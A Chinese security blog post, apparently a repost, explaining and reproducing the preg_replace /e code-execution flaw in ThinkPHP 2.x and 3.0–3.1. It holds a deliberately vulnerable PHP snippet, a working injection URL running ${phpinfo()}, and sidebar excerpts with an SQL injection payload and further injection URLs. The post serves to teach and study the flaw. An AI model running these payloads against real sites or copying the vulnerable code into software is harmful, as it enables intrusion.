Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现

最新推荐文章于 2024-09-26 13:53:30 发布
最新推荐文章于 2024-09-26 13:53:30 发布
阅读量1.7k 收藏 1
点赞数
原文链接:http://www.ioymz.com/blog/thinkphp-2-x%e3%80%813-0-3-1%e7%89%88%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%e5%a4%8d%e7%8e%b0
版权

转载自

文章目录

闲扯

学习代码执行的审计时,遇到了双引号的一些迷惑,搜资料的时候发现了这个漏洞,顺便分析复现一哈。

影响版本

2.x、3.0-3.1

原理分析

关键代码:

$depr = '\/';
$paths = explode($depr,trim($_SERVER['PATH_INFO'],'/'));
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

总体意思就是用explode函数把url拆开,然后再用implode函数拼接起来,然后带入preg_replace里面。

我们知道,preg_replace的/e模式,和php双引号都能导致代码执行的。
不懂的可以看这个ctf题目:题目

那句正则简化后就是/(\w+)\/([^\/\/]+)/e,解释一下,\w+表示匹配任意长的[字母数字下划线]字符串,然后匹配 / 符号,再匹配除了 / 符号以外的字符。
就是意思匹配连续的两个参数。

假如url是这样 : www.dawn.com/index.php?s=1/2/3/4/5/6
也就是每次匹配 1和2 、 3和4 、 5和6。

然后\\1是取第一个括号里的匹配结果,\\2是取第二个括号里的匹配结果,也就是\\1 取的是 1 3 5,\\2 取的是 2 4 6。

那么就是连续的两个参数,一个被当成键名,一个被当成键值,传进了var数组里面。

而双引号是存在在 \\2 外面的,那么就说明我们要控制的是偶数位的参数。

漏洞复现

方法1:本机搭建下载地址:http://www.thinkphp.cn/extend/219.html
方法2:vulhub里面也有,直接docker启动。(我fq了,不然一直总有一丢丢下不下来)
方法3:也可以自己用这段代码,自己模拟:

<?php
$var = array();
preg_replace("/(\w+)\/([^\/\/]+)/ie",'$var[\'\\1\']="\\2";',$_GET[s]);
?>

本地模拟:

docker搭建:

直接输入payload:

127.0.0.1:8080/indexphp?s=1/2/3/${phpinfo()}/5/6



只要payload不在第二位就行,因为前两位在处理的时候被删了。

 

可乐要加冰666
关注
thinkphp3.1.3 getshell_ThinkPHP3由注入导致的getshell
weixin_39585035的博客
11-21 2204
起因搞一个thinkphp3.1.3开发的贷款诈骗站。大佬通过xss钓鱼,让管理员下载免杀的木马上线,然后拿到了源码。审计源码发现前台存在因为$_REQUEST获取数据而导致的注入,但是密码加密方式为:解开密码的概率不大,同时在后台也没能找到getshell的地方。类似钓鱼,诈骗这类的网站几乎都是在和数据库交互,操作文件的地方比较少。正文Demo如下:我这里使用的thinkphp3.2....
thinkphp 3.1.3 php本,ThinkPHP 3.1、3.2一个通用的漏洞分析
weixin_39606638的博客
03-10 3896
Author:m3d1t10n前两天看到phithon大大在乌云发的关于ThinkPHP漏洞,想看看是什么原因造成的。可惜还没有公开,于是就自己回来分析了一下。0x00官方补丁(DB.class.php parseWhereItem($key,$val))注意红色框框起来的部分0x01分析preg_match('/IN/i',$val[0]) //该正则没有起始符和终止符,xxxxinxxxxx...
[vulfocus] thinkphp3.2.x 代码执行
最新发布
weixin_45686785的博客
09-26 153
其中,24_09_26改成相对应的日期。访问给的IP,抓包重放。
php拿站,thinkphp 3.0 爆路径漏洞
weixin_39871649的博客
03-10 493
1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。检测有两种情况1. 可执行命令,这个估计是伪3.0本?交大定票此站到可以执行命令http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D可查看本http://webshell.cc/index.php/module/action...
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 320
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
ThinkPHP 3.0~3.2 注入漏洞
weixin_34348111的博客
11-09 3876
地址:http://xx.com/index.php/Admin.php?s=/User/Public/check payload:act=verify&amp;username[0]=='1')) AND UPDATEXML(6026,CONCAT(0x2e0x7167656371,(SELECT (CASE WHEN (6026=6026) THEN 1 ELSE 0 END)),0x716...
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 8882
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
ctf之php漏洞,ctf入门到Thinkphp2.x、3.0-3.1代码执行漏洞分析
weixin_39738380的博客
04-01 753
前言:文章可能有点长,小弟不才,只能靠刷ctf来理解一些内容。若有不恰当之处,望大佬们不吝赐教。一、[BJDCTF2020]ZJCTF先做一道ctf压压惊:[BJDCTF2020]ZJCTF构建以下payload,进入if判断,并且进入include()函数?text=data://text/plain,I have a dream&file=php://filter/convert.ba...
ThinkPHP 3.2.x RCE漏洞复现
m0_46616663的博客
11-29 2318
打湖湘杯遇到一个类似的willphp题目,都审到cfile了没做出来。。。于是把这个翻出来搞了一波,过程参考了网上别的师傅的0.0 什么是ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不
ThinkPHP 2.x 任意代码执行漏洞复现
ximo的博客
03-17 708
ThinkPHP 2.x 任意代码执行漏洞 漏洞描述: ThinkPHP 2.x本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0本因为Lite模式下没有修复该漏洞,也存在这个漏洞漏洞复现 POC:
ThinkPHP 2.x 任意代码执行漏洞复现
zeroc009的博客
02-14 381
ThinkPHP 2.x 任意代码执行漏洞复现漏洞简述影响范围复现过程 漏洞简述 ThinkPHP 2.x本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.'\̲
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
Thinkphp3.2.3及以下漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
Thinkphp 漏洞小试
weixin_30532987的博客
01-23 231
首先确定这个网站使用thinkphp的框架 国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多本,如何才能知道我们使用的框架是哪个本的呢? 在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考 admin是后台工程文件夹 home是前台工程 public里面用于存放CSS文件,JS...
ThinkPHP3.2.x 代码执行漏洞
guishengyx的博客
10-19 1923
vulfocus靶场
vulfocus——thinkphp3.2.x代码执行
m0_62063669的博客
10-01 2122
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。22_10_01是复现的日期,根据自己的时间做调整。
thinkphp 2.x 任意代码执行
qq_41048303的博客
12-16 1814
thinkphp 2.x任意代码执行 1.漏洞概述 ​ ThinkPHP 2.x本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ ThinkPHP 3.0本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.环境搭
Thinkphp 2.x 任意代码执行漏洞
hovcfuti的博客
10-13 328
漏洞简介ThinkPHP 2.x本中,使用preg_replace的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0本因为Lite模式下没有修复该漏洞,也存在这个漏洞。preg_replace这个函数使用方法如下:preg_replace('正则规则','替换字符','目标字符')这个函数的3个参数,结合起来的意思是:如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞
Thinkphp3全漏洞分析
灰太的表格的博客
01-23 6633
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值